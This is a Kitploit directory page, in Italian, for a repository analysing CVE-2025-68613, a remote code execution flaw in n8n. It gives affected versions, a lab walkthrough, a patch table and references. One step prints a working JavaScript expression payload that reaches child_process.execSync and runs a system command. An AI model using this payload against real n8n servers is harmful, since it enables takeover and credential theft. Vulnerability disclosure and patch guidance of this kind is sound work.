Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
analysis-and-poc-n8n-CVE-2025-68613 — Studio tecnico della vulnerabilità CVE-2025-68613 in n8n, che copre le versioni interessate, lo scenario di esplorazione in laboratorio, l'analisi offensiva e difensiva e le strategie di mitigazione. | Kitploit
Strumenti/GitHubGitHub/releaseown/analysis-and-poc-n8n-cve-2025-68613
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
releaseown/analysis-and-poc-n8n-cve-2025-68613

analysis-and-poc-n8n-CVE-2025-68613

Studio tecnico della vulnerabilità CVE-2025-68613 in n8n, che copre le versioni interessate, lo scenario di esplorazione in laboratorio, l'analisi offensiva e difensiva e le strategie di mitigazione.

Vedi Repository
17 mesi faNon ancora revisionato

Panoramica (n8n e CVE-2025-68613)

n8n è una piattaforma di automazione dei flussi di lavoro utilizzata per integrare sistemi e servizi tramite flussi visivi ed espressioni JavaScript.

CVE-2025-68613 è una vulnerabilità critica di Esecuzione Remota di Codice (RCE), con CVSS 9.9, che colpisce più versioni di n8n. Il difetto si verifica nell'elaborazione delle espressioni JavaScript nei flussi di lavoro nelle versioni vulnerabili che non sono adeguatamente isolate. Ciò consente agli utenti autenticati con permessi di modifica di eseguire codice al di fuori del comportamento previsto dall'applicazione.

In pratica, questo difetto può essere sfruttato per eseguire comandi sul server in cui è in esecuzione n8n, utilizzando i privilegi dell'applicazione stessa. Le versioni interessate vanno dalla 0.211.0 fino alle versioni precedenti alle correzioni applicate in 1.120.4, 1.121.1 e 1.122.0.

n8n

Impatto Potenziale

  • Compromissione totale dell'istanza n8n.
  • Accesso ai dati elaborati dai flussi di lavoro.
  • Esposizione di credenziali, chiavi SSH, variabili d'ambiente e token di integrazione.
  • Accesso indiretto ai sistemi collegati.

Questo repository documenta tecnicamente CVE-2025-68613, coprendo il contesto del difetto, le versioni interessate, lo sfruttamento e le misure di mitigazione consigliate.

Ricerca di n8n su hunter

Versioni Affette e Corrette

Si consiglia di aggiornare immediatamente alla versione 1.122.0 o successiva.

Prova di Concetto (PoC)

Precondizioni dello Scenario

Per dimostrare la vulnerabilità, sono richieste le seguenti condizioni:

  • Istanza n8n in esecuzione su una versione vulnerabile
  • Utente autenticato
  • Permessi di scrittura (creazione o modifica di flussi di lavoro)

Il difetto si verifica durante la creazione e l'esecuzione dei flussi di lavoro, non prima dell'autenticazione.


Passaggi di Sfruttamento

Passaggio 1 — Autenticazione sulla Piattaforma

Il primo passaggio è accedere all'interfaccia web di n8n con un utente valido.

Schermata di login di n8n

Questo passaggio conferma che l'attacco non è anonimo. La vulnerabilità richiede un utente autenticato.


Passaggio 2 — Conferma dei Permessi

Dopo l'accesso, verificare che l'utente abbia i permessi per creare e modificare flussi di lavoro.

Schermata di gestione utenti

Questo è rilevante perché solo gli utenti con questo livello di accesso possono inserire espressioni dinamiche nei flussi di lavoro.


Passaggio 3 — Creazione di un Nuovo Flusso di Lavoro

Con l'utente autenticato, creare un nuovo flusso di lavoro da zero.

Schermata iniziale per la creazione di un flusso di lavoro

Qui inizia l'uso legittimo delle funzionalità di n8n che, nelle versioni vulnerabili, può essere sfruttato.


Passaggio 4 — Aggiunta del Trigger Manuale

Il primo nodo aggiunto al flusso di lavoro è il Trigger Manuale.

Aggiunta del Trigger Manuale

Cosa fa questo nodo: Consente l'esecuzione manuale del flusso di lavoro, utilizzato come punto di partenza del flusso.

In questo scenario, funge solo da punto di ingresso per l'esecuzione del flusso di lavoro.


Passaggio 5 — Aggiunta del Nodo Edit Fields (Set)

Il secondo nodo aggiunto è Edit Fields (Set).

Aggiunta del nodo Edit Fields (Set)

Cosa fa questo nodo: Questo nodo consente di creare, modificare o sovrascrivere campi di dati all'interno del flusso di lavoro. Accetta valori statici o espressioni JavaScript valutate al momento dell'esecuzione.

È proprio in questo punto che si manifesta la vulnerabilità.


Passaggio 6 — Inserimento dell'Espressione Vulnerabile

All'interno del campo del valore del nodo Edit Fields (Set), inserire un'espressione JavaScript racchiusa da {{ }}, che è il formato utilizzato da n8n per valutare le espressioni dinamiche.

Campo espressione con payload

Payload di esempio:

root@kitploit:~
{{ (function(){ 
  return this.process.mainModule
    .require('child_process')
    .execSync('id')
    .toString() 
})() }}
  • (function(){ ... })(): Definisce una funzione autoinvocante, consentendo l'incapsulamento di tutta la logica e restituendo un valore direttamente all'espressione del flusso di lavoro.
  • this.process: Accede all'oggetto process interno di Node.js, che espone informazioni e risorse di runtime.
  • process.mainModule: Consente l'accesso al modulo principale dell'applicazione, permettendo il caricamento di altri moduli interni di Node.js.
  • require('child_process'): Modulo nativo di Node.js che consente di creare nuovi processi sul sistema operativo ed eseguire comandi esterni.
  • execSync('id'): Esegue un comando direttamente sul sistema operativo in cui è in esecuzione n8n, utilizzando i privilegi del processo dell'applicazione.
  • .toString(): Converte l'output del comando eseguito in testo, consentendo di visualizzare il risultato nell'interfaccia di n8n.

Risultato Finale

Il risultato visualizzato conferma che il comando è stato eseguito sul sistema operativo utilizzando i privilegi del processo n8n, caratterizzando un'Esecuzione Remota di Codice (RCE).

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2025-68613
  • https://motasemhamdan.medium.com/unpacking-n8n-rce-cve-2025-68613-39e4f3417358
  • https://ccb.belgium.be/advisories/warning-remote-code-execution-n8n-patch-immediately
  • https://gbhackers.com/poc-exploit-for-critical-n8n-rce-vulnerability/
Scarica lo strumento
StatoVersione n8nNota
❌ Affetta>= 0.211.0Introduzione del meccanismo vulnerabile
❌ Affetta< 1.120.4Vulnerabile fino alla patch nel ramo 1.120
❌ Affetta< 1.121.1Vulnerabile fino alla patch nel ramo 1.121
❌ Affetta< 1.122.0Vulnerabile fino alla patch nel ramo 1.122
✅ Corretta1.120.4Correzione ufficiale applicata
✅ Corretta1.121.1Correzione ufficiale applicata
✅ Corretta>= 1.122.0Correzione inclusa di default